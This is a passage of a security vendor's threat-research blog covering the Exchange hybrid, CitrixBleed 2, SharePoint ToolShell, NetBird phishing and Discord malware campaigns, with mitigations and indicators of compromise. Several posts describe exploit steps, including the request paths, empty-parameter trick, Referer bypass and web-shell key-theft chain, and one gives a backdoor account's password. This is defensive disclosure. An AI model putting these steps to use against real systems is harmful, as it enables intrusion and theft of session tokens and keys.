(Microsoft, 2025; CISA, 2025; Cybersecurity Dive, 2025; Forbes, 2025).August 2025 - Microsoft begins temporary EWS blocks for tenants still using the shared principal to accelerate migration (Gatlan, 2025; Help Net Security, 2025).October 31, 2025 - Permanent block of the shared service principal path scheduled; hybrid features dependent on it will stop working if the dedicated app is not configured (Help Net Security, 2025)TTPs & IOCsTactics, Techniques, and Procedures:Privilege escalation via abuse of a shared service principal in hybrid identity trust (Microsoft, 2025).Token forgery/impersonation using server certificate credentials and S2S/OAuth tokens (The Hacker News, 2025).Defense evasion through audit/visibility gaps when actions originate from on‑prem Exchange (Gatlan, 2025).Indicators of Compromise (IOCs):While no official IOCs have been published, proactive threat hunting should focus on behavioral anomalies. Defenders should monitor for:Anomalous Token Requests Any unusual or high-volume S2S/OAuth token requests originating from the on-premises Exchange server's service principal, especially outside of normal business hours.Unusual Cloud Activity from Hybrid Accounts Suspicious activity (e.g., widespread email access, file deletion in SharePoint Online) performed by a user account shortly after authenticating from the on-premises environment.Mismatched Privileges Any administrative actions taken in Exchange Online by a user who only holds administrative privileges in the on-premises environment.Centripetal’s PerspectiveCentripetal views CVE‑2025‑53786 as an identity‑layer vulnerability that collapses the boundary between on‑prem and cloud trust when the shared service principal remains in place (Microsoft, 2025). Although neither Microsoft nor CISA has observed in‑the‑wild exploitation at disclosure, both the design weakness and the Black Hat demonstration, show how on‑premise compromises can stealthily creep into cloud privilege. Our guidance aligns with Microsoft and CISA; prioritize moving to a dedicated Exchange hybrid application, reset the shared principal’s keyCredentials, and validate the posture with Health Checker. From a defense‑in‑depth standpoint, pair strong identity monitoring with network‑level controls and strict exposure management for any legacy or EOL servers .Centripetal is also pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative.Public Resourceshttps://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53786https://www.cybersecuritydive.com/news/cisa-microsoft-warn-about-new-microsoft-exchange-server-vulnerability/757022/https://www.bleepingcomputer.com/news/microsoft/microsoft-warns-of-high-severity-flaw-in-hybrid-exchange-deployments/https://thehackernews.com/2025/08/microsoft-discloses-exchange-server.htmlhttps://cybersecuritynews.com/microsoft-exchange-server-vulnerability/https://www.helpnetsecurity.com/2025/08/07/exchange-hybrid-deployment-vulnerability-cve-2025-53786/https://www.forbes.com/sites/daveywinder/2025/08/10/cisa-issues-urgent-microsoft-cve-2025-53786-security-warning/Dirk-jan Mollema, Advanced Active Directory to Entra ID lateral movement techniques --- ### [Critical NetScaler Flaw Exposes Sensitive Memory Contents to Remote Attackers](https://www.centripetal.ai/threat-research/citrixbleed-2-critical-netscaler-flaw-exposes-sensitive-memory-contents-to-remote-attackers) Published: 2025-07-25 Summary: CVE-2025-5777, or CitrixBleed 2, is a memory overread vulnerability in NetScaler ADC and NetScaler Gateway that exposes sensitive data to unauthenticated remote attackers. This vulnerability demands… CVE-2025-5777, nicknamed CitrixBleed 2, is a critical vulnerability observed since early June in Citrix Netscaler ADC and Gateway instances. Citrix has fixed this vulnerability in their latest update and it is recommended to immediately upgrade NetScaler ADC and NetScaler Gateway appliances to the recommended patched versions. With a 9.3 score on CVSS v4.0, CVE-2025-5777 is an insufficient input validation vulnerability that leads to a memory overread issue. This critical flaw allows an unauthenticated attacker to remotely read sensitive memory contents from vulnerable NetScaler appliances. The original “CitrixBleed” vulnerability (CVE-2023-4966), was exploited by various ransomware groups and nation-state actors which led to significant data breaches across different industrial sectors. Considering this previous impact, it is strongly recommended to implement the mitigation steps for CitrixBleed 2 before any attacker takes advantage of the vulnerability.Vulnerability Type (CWE)CWE-125: CVE-2025-5777 is a vulnerability where the program doesn't check the size of the input data correctly. This leads to a memory overread, meaning it tries to read data from out-of-bounds memory locations it shouldn't access. The vulnerability is specifically triggered when the NetScaler appliance is configured as a Gateway (serving as a VPN virtual server, ICA Proxy, CVPN, or RDP Proxy) or an AAA (Authentication, Authorization, and Auditing) virtual server.CVSS ScoreBase Score: 9.3 (Critical) Attack Vector: Network (AV:N) Attack Complexity: Low (AC:L) Privileges Required: None (PR:N) User Interaction: None (UI:N) Scope: Unchanged (S:U) Impact on CIA: HighConfidentiality: High (SC:H)Integrity: High (SI:H)Availability: High (SA:H)Impacted VersionsThe CVE-2025-5777 vulnerability specifically affects Citrix NetScaler ADC and NetScaler Gateway appliances. It is crucial for organizations to identify if their deployments fall within the vulnerable product lines and specific build versions. Citrix notified people of the affected and patched versions:Impacted VersionsPatched VersionsNetScaler ADC and NetScaler GatewayNetScaler ADC and NetScaler Gateway14.1 prior 14.1-43.5614.1-43.56 and later releases  NetScaler ADC and NetScaler GatewayNetScaler ADC and NetScaler Gateway13.1 prior 13.1-58.3213.1-58.32 and later releases of 13.1  NetScaler ADC 13.1-FIPS and NDcPPNetScaler ADC 13.1-FIPS and NDcPPprior 13.1-37.235-FIPS13.1-37.235 and later releases of 13.1-FIPS and 13.1-NDcPP  NetScaler ADC 12.1-FIPSNetScaler ADC 12.1-FIPSprior 12.1-55.328-FIPS12.1-55.328 and later releases of 12.1-FIPSMitigation StepsAddressing this critical vulnerability requires immediate action. The first step is to upgrade all the affected NetScaler ADC and Gateway appliances to the latest/recommended patched versions. For appliances configured as Gateway or AAA virtual servers, there are no other available mitigations besides applying these patches. Citrix also recommends to terminate all active ICA and PCoIP sessions after all NetScaler appliances in the HA pair or cluster have been upgraded to the fixed builds. These can be achieved by running the below mentioned commands: kill icaconnection -all kill pcoipConnection -all kill rdp connection -all kill ssh connection -all kill aaa session -all kill telnetConnection -all kill connConnection -all Post upgrading and terminating sessions, organizations can also implement the following security measures: Restriction of network access to the NetScaler Management Interface to reduce its exposure.Implementation of additional network segmentation to isolate critical systems thereby limit the potential of attackers to perform lateral movement.Deployment or update WAF to filter for malicious traffic and block known exploitation patterns associated with the CVE.Continuous monitoring for any suspicious network activities, unauthorized access attempts targeting NetScaler devices.Exploit ProcessThe CitrixBleed 2 vulnerability leverages a memory management flaw to achieve pre-authentication memory disclosure, which can lead to authentication bypass and session hijacking. An unauthenticated attacker would use the following steps to exploit this vulnerability:Send an HTTP POST request to the /p/u/doAuthentication.do endpoint and omit the value for the login parameter. Typically a normal user would use login=username as the query parameter, but the attacker would omit the username value and just use the login as a parameter by itself. This triggers a error in the backend, causing a memory variable to remain uninitialized.Monitor the server’s response which is typically an XML-formatted data and lookout for the value inside <InitialValue>XML element which leaks memory contentEach request is observed to leak roughly around 127 bytes of memory from the stack which includes sensitive data such as session cookies, auth tokens and much more.TimelineJune 17, 2025: The National Vulnerability Database (NVD) publishes initial details for CVE-2025-5777, describing it as an insufficient input validation vulnerability leading to memory overread.June 24, 2025: The CVE begins to trend in security discussions within the cybersecurity community.June 26, 2025: Citrix, in an official blog post, states that as of this date, there is "no evidence to suggest exploitation of CVE-2025-5777.July 10, 2025: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds CVE-2025-5777 to its Known Exploited Vulnerabilities (KEV) catalog, officially confirming its active exploitation in the wild.TTPs & IOCsThe Tactics, Techniques, and Procedures (TTPs) employed by attackers exploiting CVE-2025-5777 is as follows:Initial Access via Malformed Requests The exploit is initiated by crafting a malicious HTTP request to NetScaler Gateway or AAA Virtual servers which contain a malformed login parameter.Memory Leakage and Token Theft The vulnerability allows attackers to repeatedly leak small chunks of memory (approximately 127 bytes per request)Session Hijacking and MFA Bypass Using the stolen session tokens, attackers can hijack existing authenticated sessions. With an active session token, attackers can also bypass MFA checks and gain access to internal networks.Post-Exploitation After establishing initial access, attackers have been seen performing extensive Active Directory reconnaissance which includes utilizing tools such as ADExplorer64.exe, using LDAP queries and more.Indicators of Compromise (IOCs): 45.135.232[.]205 38.54.59[.]96 78.128.113[.]30 89.7.196[.]73 124.77.248[.]219 45.93.30[.]243 45.93.30[.]98 39.187.211[.]197 45.134.26[.]35 196.251.118[.]160 45.93.30[.]40 154.38.121[.]214 121.237.80[.]248 91.219.238[.]78 38.244.138[.]83  Centripetal’s PerspectiveAt Centripetal, staying ahead of emerging cyber threats is our commitment to your security. We constantly monitor the threat intelligence and our recent observations around the CitrixBleed 2 vulnerability highlight the importance of proactive threat intelligence in keeping everyone safe. Centripetal’s threat intelligence telemetry confirms early and comprehensive detection of the CitrixBleed 2 CVE-2025-5777 vulnerability, achieving 100% coverage of all known malicious IP addresses linked to the campaign.  Shortly after CISA added CVE-2025-5777 to the Known Exploited Vulnerability (KEV) catalog, we saw a huge surge in the exploitation attempts. GreyNoise’s statistics show a huge spike in the activity on the 8th of July, reaching it’s highest peak on July 11.  However, long before the vulnerability was widely recognized, our active threat intelligence data began flagging suspicious activity. As early as the 4th of May, we observed Indicators of Compromise (IOCs) related to the CitrixBleed 2 vulnerability. Despite multiple IOCs being observed in our intelligence data, 15 of them particularly have been found to perform malicious activities and not merely crawling or scanning.  Our ability to provide such robust protection is powered by a diverse array of threat intelligence sources. We collaborate with leading threat intelligence providers such as GreyNoise, Recorded Future, and many others  With a high score of 9.3 on the CVSS scale and having a no-user interaction exploit process with low-complexity attack chain, this vulnerability has become an extremely attractive target for bad actors, including sophisticated ransomware groups. This memory leak vulnerability has the potential to leak sensitive information such as tokens, credentials and much more. At the time of writing, this vulnerability is actively exploited much like the original CitrixBleed which surfaced on 2023. Threat actors exploiting this vulnerability have largely been targeting the financial sector but also go after the vulnerable versions of NetScaler appliances across multiple industries including federal agencies. Centripetal urges its customers to patch the vulnerable instances and recommends terminating various sessions such as the ICA, PCoIP, RDP, SSH and others as listed in the Mitigation Steps section. Centripetal also provides 100% coverage to all the known indicators of compromise associated with this vulnerability.If you are a current client of Citrix NetScalar please contact support@centripetal.ai. Centripetal is also pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative.Public Resourceshttps://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX693420https://www.cisa.gov/news-events/alerts/2025/07/10/cisa-adds-one-known-exploited-vulnerability-cataloghttps://labs.watchtowr.com/how-much-more-must-we-bleed-citrix-netscaler-memory-disclosure-citrixbleed-2-cve-2025-5777/https://www.cvedetails.com/cve/CVE-2025-5777/https://thehackernews.com/2025/07/cisa-adds-citrix-netscaler-cve-2025.htmlhttps://www.imperva.com/blog/cve-2025-5777-exposes-citrix-netscaler-to-dangerous-memory-leak-attacks/https://www.infosecurity-magazine.com/news/citrixbleed-2-vulnerability/https://horizon3.ai/attack-research/attack-blogs/cve-2025-5777-citrixbleed-2-write-up-maybe/https://arcticwolf.com/resources/blog-uk/follow-up-updates-on-actively-exploited-information-disclosure-vulnerability-citrix-bleed-2-in-citrix-netscaler-adc-and-gateway/ --- ### [Attackers Leverage SharePoint Zero-Day RCE to Gain Complete Server Access](https://www.centripetal.ai/threat-research/attackers-leverage-sharepoint-zero-day-rce-to-gain-complete-server-access) Published: 2025-07-25 Summary: A large-scale exploitation of a zero-day remote code execution vulnerability in SharePoint (CVE-2025-53770) allows attackers to gain complete server access through unauthenticated means, posing a… As of July 18, 2025, there has been a large-scale attempted exploitation of SharePoint on-prem instances that are vulnerable to an unauthenticated remote code execution (RCE) vulnerability chain. Vulnerabilities CVE-2025-53770 (SharePoint ToolShell Auth Bypass and RCE ) and CVE-2025-53771 (SharePoint ToolShell Path Traversal) were derivative CVEs created by Microsoft, and observed to be following the exploit chain using CVE-2025-49706 and CVE-2025-49704 disclosed in Pwn2Own Berlin in May 2025. At the time of analysis, a significant number of SharePoint endpoints remained publicly accessible, with exploitation attempts being attributed to nation-state groups including Chinese-linked actors Linen Typhoon, Violet Typhoon, and Storm-2603 (Microsoft, 2025). The veracity of this attack method demonstrates the use of SharePoint as a SaaS product being hosted and managed by Microsoft, has trumped on premises solutions with faster patching, centralized management and monitoring.CVE-2025-53770Vulnerability Type (CWE)CWE-502: Deserialization of Untrusted DataFigure 1: Mitre’s representation of CWE:502 (CVE.Mitre, 2024))CVSS ScoreBase Score: 9.8 (Critical)Attack Vector: Network (AV:N)Attack Complexity: Low (AC:L)Privileges Required: None (PR:N)User Interaction: None (UI:N)Scope: Unchanged (S:U)Impact on CIA: HighConfidentiality: High (SC:H)Integrity: High (SI:H)Availability: High (SA:H)CVE-2025-53771Vulnerability Type (CWE)CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')Figure 2: Mitre’s representation of CWE:22 (CVE.Mitre, 2024))CWE-707: Improper Neutralization (CVE.Mitre, 2024)CWE-20: Improper Input ValidationFigure 3: Mitre’s representation of CWE:502 (CVE.Mitre, 2024))CVSS ScoreBase Score: 6.3 (Medium)Attack Vector: Network (AV:N)Attack Complexity: Low (AC:L)Privileges Required: Low (PR:L)User Interaction: Required (UI:R)Scope: Unchanged (S:U)Impact on CIA: HighConfidentiality: High (SC:H)Integrity: Low (SI:L)Availability: None (SA:N)Impacted VersionsMicrosoft SharePoint Server 2019 (Patch available)Microsoft SharePoint Server 2016 (Patch pending)Microsoft SharePoint Server Subscription Edition (Patch available)SharePoint Online is not affected.Mitigation StepsMicrosoft recommends that administrators take the following actions immediately to mitigate the risk of exploitation:Apply Security UpdatesInstall the July 2025 Security Update and any subsequent patches for your version of SharePoint as soon as they are available.SharePoint Subscription Edition and SharePoint Server 2019 have updates available. Updates for SharePoint Server 2016 are pending release.Enable Antimalware Scan Interface (AMSI) (Not to be applied in lieu of patching)Ensure AMSI is enabled and configured in Full Mode.Use a compatible antivirus solution.AMSI support was introduced in the September 2023 update for SharePoint 2016/2019 and Version 23H2 for Subscription Edition.If AMSI cannot be enabled, consider disconnecting the SharePoint server from the internet until updates are applied.Deploy Endpoint Detection and Response (EDR)Deploy Microsoft Defender for Endpoint or an equivalent EDR solution to monitor and block post-exploitation activity.Rotate ASP.NET Machine KeysAfter applying security updates or enabling AMSI, rotate SharePoint Server ASP.NET machine keys to invalidate any potentially compromised keys.Restart IIS on all SharePoint servers following key rotation.To rotate via PowerShell:Update-SPMachineKeyTo rotate via Central Administration:Go to Central Admin → Monitoring → Review job definitionsLocate "Machine Key Rotation Job" and select "Run Now"After completion, run iisreset.exe on each serverFollow National Authority and Microsoft’s DirectionUS federal agencies are required to apply mitigations by July 21, 2025, as per the CISA KEV catalog directive. European agencies have also issued advisories based on the Microsoft Guidance (Microsoft, 2025).Hunt for CompromiseReview server logs for the Indicators of Compromise (IOCs) listed below to determine if your systems have been targeted.Exploit ProcessThe attack follows a multi-step process to achieve unauthenticated RCE and steal sensitive keys:Authentication Bypass (CVE-2025-53771): The attacker sends a specially crafted POST request to the $../_layouts/15/ToolPane.aspx$ endpoint. By setting the HTTP Referer header to /_layouts/SignOut.aspx, they bypass authentication checks.Payload Drop: The successful bypass allows the execution of an encoded PowerShell command. This command decodes a Base64 string and writes a malicious ASPX file, spinstall0.aspx, to a web-accessible directory.Cryptographic Key Theft: The attacker sends a GET request to the newly dropped $../_layouts/15/spinstall0.aspx$ file. This is not a typical webshell; its sole purpose is to use .NET methods to read the server's MachineKey configuration (including the ValidationKey and DecryptionKey) and return it in the HTTP response.__VIEWSTATE Payload Generation: With the stolen ValidationKey, the attacker uses a tool like ysoserial.net to craft a malicious, serialized __VIEWSTATE payload containing arbitrary commands.Remote Code Execution (CVE-2025-53770): The attacker submits the malicious __VIEWSTATE payload to any valid SharePoint page. The server deserializes the payload, which it now trusts due to the valid signature, and executes the embedded commands.TimelineDateDescriptionMay 2025"ToolShell" (CVE-2025-49706 + CVE-2025-49704) demonstrated at Pwn2Own BerlinJuly 18, 2025Active, in-the-wild exploitation of a new variant chain beginsJuly 19, 2025Eye Security, Palo Alto Networks, and Microsoft publish advisories and IOCs. (See “Public Resources” section)July 20, 2025CISA adds CVE-2025-53770 to its Known Exploited Vulnerabilities (KEV) catalogJuly 21, 2025Microsoft releases patches for SharePoint Server 2019 & Subscription Edition and clarifies that CVE-2025-53770 is the code injection flaw and CVE-2025-53771 is the auth bypassJuly 22, 2025Microsoft attributes nation-state actors to exploiting these chain vulnerabilitiesTTPs & IOCsTactics, Techniques, and Procedures (TTPs)Initial Access:T1190: Exploit Public-Facing ApplicationExecution:T1668.001: Server-Side Template InjectionT1059.001: PowerShellPersistence & Credential Access:T1505.003: Web ShellT1528: Steal Application Access Token by exfiltrating cryptographic machine keysDefense Evasion:T1027.002: Obfuscated Files or Information: Encoded CommandIndicators of Compromise (IoCs)IP Addresses:Initially released Indictors: 107.191.58[.]76 104.238.159[.]149 96.9.125[.]147 103.186.30[.]186 Extended Indicators referenced by EyeSecurity: 45.191.66[.]77 45.77.155[.]170 64.176.50[.]109 206.166.251[.]228 34.72.225[.]196 34.121.207[.]116 141.164.60[.]10File Indicators:Filename: spinstall0.aspxFile Path: $C:\\PROGRA~1\\COMMON~1\\MICROS~1\\WEBSER~1\\16\\TEMPLATE\\LAYOUTS\\spinstall0.aspx$ (and similar paths for other versions)SHA256 Hash: 92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514Network Indicators:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0Exploit Path (POST): /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspxKey HTTP Header: Referer: /_layouts/SignOut.aspxPayload Exfiltration (GET): Request to /_layouts/15/spinstall0.aspxCentripetal’s PerspectiveMonitored inbound web traffic was first observed targeting a customer’s environment on July 21, 2025. The traffic from the previously unreported IPs outlined below were observed to be crafting the malicious POST requests that were being used for the exploit path. Further traffic composed of the specifically crafted GET requests to achieve payload exfiltration. Centripetal’s Intelligence Operations team responded to this traffic by shielding all of our customers from the identified IPs, and kicking off our customer incident protocols to support and provide guidance. Centripetal’s Intelligence Operations team continues to monitor for this activity against our customer’s environments and this activity is proactively shielded by CleanINTERNET® as the threat intelligence evolves for this campaign.Indicators observed by Centripetal's Intelligence Operations Team: 116.234.34[.]5 60.178.230[.]96 129.227.230[.]84 117.182.107[.]175 154.205.143[.]3 103.186.30[.]186Wider LandscapeThe wider intelligence community continues to monitor the evolution of these vulnerabilities. At the time of analysis, over 16,400 SharePoint publicly exposed assets were identified on Shodan (Figure 7). As referenced by SocRadar (SocRadar, 2025), the composition of associated countries of these servers rank the United States and Iran as having the highest counts with Malaysia, Netherlands and Ireland completing the top 5 rank. Figure 4: Snapshot of Shodan’s data on SharePoint assets (Shodan.io, 2025)SEO term search worldwide as per Google rends. There is a general correlation between the affected regions and the Google searches uptick observed.Figure 5: The interest in the term “sharepoint vulnerability” unsurprisingly spiked on 21 July, 2025Figure 6: SEO results by region ranking Singapore and Belgium as the top searchersCentripetal is actively monitoring for network indicators indicating the exploitation of CVE-2025-53770, CVE-2025-53771, CVE-2025-49704 and CVE-2025-49706. At the time of publishing, Centripetal offered maximum coverage across known indicators.Leveraging billions of threat indicators, CleanINTERNET dynamically blocks malicious traffic using real-time global threat feeds and augmented human analysis, proactively protecting organizations from exploitation attempts involving known IoCs. This approach ensures reduced attack surface, enhanced security operations, and uninterrupted business continuity, enabling organizations to adopt a proactive and adaptive cybersecurity strategy against evolving threats.As SharePoint is broadly used as a Microsoft product, the impact observed by this widespread exploitation has continued to evolve. From the disclosure of the initial CVE exploit chain in Pwn2Own Berlin in May 2025, the CVE variants have affected multiple organizations and have had extensive coverage from the security community. The disclosure of these CVEs illustrates that patching is often not enough to protect an environment from threat actors, however, having a proactive defense and a hardened security posture helps mitigate novel attack methods.Centripetal is also pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative.Resourceshttps://nvd.nist.gov/vuln/detail/CVE-2025-49704https://nvd.nist.gov/vuln/detail/CVE-2025-49706https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53770https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53771https://research.eye.security/sharepoint-under-siege/#timelinehttps://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-07-19-Microsoft-SharePoint-vulnerabilities-CVE-2025-49704-and-49706.txthttps://www.helpnetsecurity.com/2025/07/20/microsoft-sharepoint-servers-under-attack-via-zero-day-vulnerability-with-no-patch-cve-2025-53770/https://www.theregister.com/2025/07/21/infosec_in_brief/CVE-2025-53770CVE-2025-53771https://cwe.mitre.org/data/definitions/22.htmlhttps://cwe.mitre.org/data/definitions/707.htmlhttps://cwe.mitre.org/data/definitions/20.htmlhttps://cwe.mitre.org/data/definitions/502.htmlhttps://www.wiz.io/blog/sharepoint-vulnerabilities-cve-2025-53770-cve-2025-53771-everything-you-need-to-khttps://x.com/codewhitesec/status/1944743478350557232   --- ### [Threat Actors Abuse NetBird in Spear-Phishing Campaign Targeting Finance Executives](https://www.centripetal.ai/threat-research/threat-actors-abuse-netbird-in-spear-phishing-campaign-targeting-finance-executives) Published: 2025-07-24 Cybersecurity firm Trellix uncovered a sophisticated spear-phishing operation in late May 2025 that exploited NetBird, a legitimate open-source remote access platform, to infiltrate organizations worldwide.The campaign has targeted financial executives across Europe, Africa, Canada, the Middle East, and South Asia, with companies in the banking, insurance, investment, and energy sectors especially affected (Trellix, 2025; The Hacker News, 2025). Following a detailed analysis by security firm Trellix, NetBird confirmed the attacks originated from a single malicious account that registered 197 machines, which was subsequently disabled. The total number of distinct organizations remains unknown as multiple machines could have been breached within a single entity (Trellix, 2025; NetBird, 2025).The campaign which is being tracked by researchers, but has not yet been attributed to a known threat actor group, observed fake recruiter emails impersonating Rothschild & Co. offering “strategic opportunities” to lure victims. These messages initiated a multi-stage infection sequence designed to covertly install NetBird and OpenSSH on victim systems (Bobsguide, 2025). Despite the abuse, NetBird confirmed that no vulnerability was exploited, the attackers leveraged admin privileges gained through social engineering (NetBird, 2025).Attack ChainInitial Lure: A phishing email posing as a Rothschild & Co recruiter contains a PDF attachment that links to a Firebase-hosted site (Trellix, 2025).CAPTCHA Gate: The phishing site hides the real URL using encrypted JavaScript, which is only revealed after solving a custom CAPTCHA (Insikt, 2025).Downloader:Stage One : Victims download a ZIP archive named Rothschild_&*Co-6745763.zip, containing a 1KB VBScript (Rothschild*&_Co-6745763.vbs). This script contacts a C2 server to retrieve and execute a secondary script (pull.vbs) using wscript.exe (The Hacker News, 2025).Stage Two: The secondary VBScript downloads a payload (trm), renames it to trm.zip, and extracts NetBird and OpenSSH MSI installers. These tools are silently installed, and their services are launched (The Hacker News, 2025).Persistence Setup: The script creates a hidden local admin account named “user” with password Bs@202122, enables RDP, schedules NetBird auto-launch on reboot, modifies firewall rules, and removes NetBird shortcuts to stay undetected (NetBird, 2025).Mitigation StrategiesFor ExecutivesApproach unsolicited job opportunities with skepticism, especially ZIP attachments.Do not bypass security alerts or enable content from suspicious sources.Immediately report suspicious messages to IT or security teams.For Security TeamsDeploy EDR tools to monitor abnormal VBS/PowerShell use and MSIExec behavior.Track creation of new local admin accounts with generic names.Implement a high-priority alert for .zip files containing .vbs scripts delivered via email, especially when the VBScript is small (<5KB) and makes external network connections.Continuously audit firewall modifications and scheduled task changes.Integrate phishing trends and simulations into employee training (Bobsguide, 2025).TTPs & IOCsMITRE ATT&CK MappingT1566.002T1204.002T1059.005T1105T1059.001T1218.007T1543.003T1136.001T1053.005T1548.002T1112T1562.004T1021.001T1021.004  Spearphishing via LinkUser Execution (ZIP/VBS)VBScript ExecutionTool Transfer (via HTTP)PowerShell ExecutionSigned Binary Proxy Execution (msiexec)Windows Service CreationLocal Account CreationScheduled Task CreationBypass UACRegistry ModificationFirewall Rule ManipulationRDP Remote AccessSSH Remote Access  Indicators of Compromise (IOCs)Indicator TypeIndicatorIP Address192[.]3[.]95[.]152Stage-0 URLhttps://googl-6c11f.firebaseapp[.]com/…Redirect URLhttps://googl-6c11f.web[.]app/…Stage-1 VBScriptRothschild_&_Co-6745763.vbs (53192b6ba65a6abd44f167b3a8d0e52d)Stage-2 VBScriptpull.vbs (b91162a019934b9cb3c084770ac03efe)Payload Archivetrm.zipLocal Admin Accountuser / Bs@202122Servicesnetbird, sshdSetup KeyE48E4A70-4CF4-4A77-946B-C8E50A60855ACentripetal’s PerspectiveThis campaign demonstrates a blend of evasive delivery tactics and abuse of legitimate software to establish persistent access on executive endpoints. Centripetal’s network intelligence capabilities provided early visibility into the adversary’s infrastructure. Notably, the command-and-control IP address 192.3.95[.]152, used for second-stage payload retrieval, was observed and classified on June 4, 2025, with 100% detection coverage across internal threat intelligence feeds. In addition, the stage-zero and redirect domains: googl-6c11f.firebaseapp[.]com and googl-6c11f.web[.]app, were matched and covered within external DNS intelligence sources as early as May 17, 2025. This dual-layer coverage across both IP and domain observables ensured pre- and post-compromise visibility, bolstering early mitigation capabilities.Cross-feed coverage analysis showed full threat recognition using the minimal necessary provider set. Combined with high-confidence CTI matching, this enabled effective disruption of the attack chain before adversaries could progress to lateral movement or data theft. Centripetal’s detection data underscores the importance of maintaining comprehensive coverage of remote-access infrastructure across diverse intelligence sources. The NetBird spear-phishing campaign serves as a stark reminder that an attacker’s most effective tool can be one already running in the target’s environment. With persistent techniques and evasive phishing lures, the attackers demonstrated a methodical and patient approach targeting high-level executives which calls for aggressive defense-in-depth security strategies. Organizations must prioritize executive protection, enhance endpoint visibility, and institutionalize ongoing awareness training. NetBird remains a secure product; however, its abuse by attackers underlines the importance of access controls and anomaly detection across enterprise endpoints to detect adversaries who hide in plain sight.Centripetal is also pleased to offer Penetration Testing and Vulnerability Assessment services to help organizations identify vulnerabilities and reduce risk. If interested, please contact our Professional Services team at profservs@centripetal.ai or reach out to your Centripetal Account Representative.Resourceshttps://www.trellix.com/blogs/research/cfo-spear-phishing-netbird-attack/https://x.com/threatinsight/status/1927871419934986330https://www.cybersecuritydive.com/news/spearphishing-remote-access-campaign-cfos-finance-executives-trellix/749192/?&web_view=truehttps://netbird.io/knowledge-hub/netbird-response-to-spear-phishing-campaign-targeting-financial-executiveshttps://www.bobsguide.com/cfos-targeted-globally-by-phishing-attacks/ --- ### [Discord Invites Are Leveraged in Malware Distribution](https://www.centripetal.ai/threat-research/discord-invites-leveraged-in-malware-distribution) Published: 2025-07-16 Summary: Threat actors are hijacking expired Discord invite links to deliver multi-stage malware including AsyncRAT and Skuld Stealer. Learn how this social engineering campaign works, what makes it… Threat actors are actively abusing a flaw in Discord’s invite link system to deliver malware through hijacked or spoofed server invites. The campaign, uncovered in mid-2025 by multiple cybersecurity research teams, leverages expired or recycled Discord invite links and redirects users through silent redirection chains that lead to multi-stage malware payloads. These payloads include AsyncRAT, Skuld Stealer, and ChromeKatz malware families designed to exfiltrate sensitive data such as credentials, browser cookies, and Discord session tokens. The campaign leverages user trust in Discord branding, making it highly effective for social engineering. Attack Flow An in-depth analysis by security firm Check Point (CheckPoint, 2025) details how threat actors exploit unused or expired Discord invite links to lure victims into malicious servers that ultimately deliver malware payloads (Figure 1). The report goes beyond surface-level technical observations, providing insight into more advanced techniques uncovered by researchers, including obfuscation and encryption methods used to conceal a multi-stage infection chain, as illustrated in Figure 2. Figure 1, Attack chain overview (Sourced from CheckPoint) Attack Chain Stage 1 – Reconnaissance & Lure Setup Target Audience: Gamers, Discord community members, modding forums, crypto users, and occasionally corporate users with Discord access. Initial Setup: Threat actors harvest expired or weakly protected Discord invite links. Alternatively, they generate new fake Discord invites mimicking legitimate communities (e.g., with vanity URLs or similar names). Malicious links are crafted to resemble normal discord[.]gg/abc123 invites. Stage 2 – Distribution / Social Engineering Delivery Methods: Phishing emails (Discord-themed invites or game giveaways). Direct Messages (DMs) inside Discord, often from compromised accounts. Malvertising on game mod sites, cracked software sites, cheat forums. Lure Examples: “Join our exclusive modding Discord” “Claim your Nitro gift here” “Private server invite for testers” Stage 3 – Silent Redirection / Hijack Clicking the malicious discord[.]gg/* link triggers: Silent redirect chains, often hosted on cloaking or analytics platforms. In some cases, the attacker abuses a Discord flaw allowing reuse of expired invite codes to inject redirects or custom content (BleepingComputer, 2025). Intermediate redirect platforms: discordgift[.]net, cdn.discordfiles[.]app, ngrok[.]io, .buzz, .shop, etc. Often obfuscated or shortened with services like bit[.]ly. Stage 4 – Payload Delivery The redirection eventually lands on: Fake download pages (e.g., for mods, installers, Discord Nitro tools). Browser exploit kits (occasionally detected). Direct malware drop (ZIP, EXE, or PowerShell loaders). ClickFix Lure: Victims are tricked into interacting with a fake “verification” or “security” prompt. Clicking triggers background execution of CMD or PowerShell commands via malicious JavaScript or embedded scripts. (Centripetal, 2025) Common payloads: RedLine Stealer Lumma Stealer Quasar RAT / AsyncRAT Clipper malware for wallet address manipulation Stage 5 – Execution & Persistence Malware executes to: Exfiltrate credentials, browser cookies, Discord tokens. Establish persistence via startup entries or scheduled tasks. Contact C2 via Discord webhook, PasteBin clones, or Telegram bots. In some cases, the infected system is used to further spread the lure via Discord DMs. Stage 6 – Lateral Movement / Secondary Targeting Indicators observed in isolated cases: Stolen tokens used to compromise high-permission Discord users. Internal Discord channels targeted to phish others. RDP credentials and saved browser passwords used for further intrusion into corporate systems. Mitigation Strategies While attackers continue to find new ways to exploit trusted platforms like Discord, security experts are actively working in parallel to identify vulnerabilities and develop effective mitigation strategies. In response to this campaign, the broader security community has published a number of recommendations to help reduce associated risks. The following list compiles key mitigation strategies drawn from those efforts. Discord Users Avoid untrusted links and downloads - Refrain from clicking on unfamiliar links or downloading files from unknown or unverified sources. Be wary of fake verification prompts: Do not trust invites that require you to run manual commands (such as PowerShell) or download software as part of a “verification” process. Confirm the legitimacy of invite links: Only accept Discord invites verified through official channels, such as an organization’s website or social media. Avoid links from outdated forums or unofficial sources. Protect your personal information: Exercise caution when sharing personal or 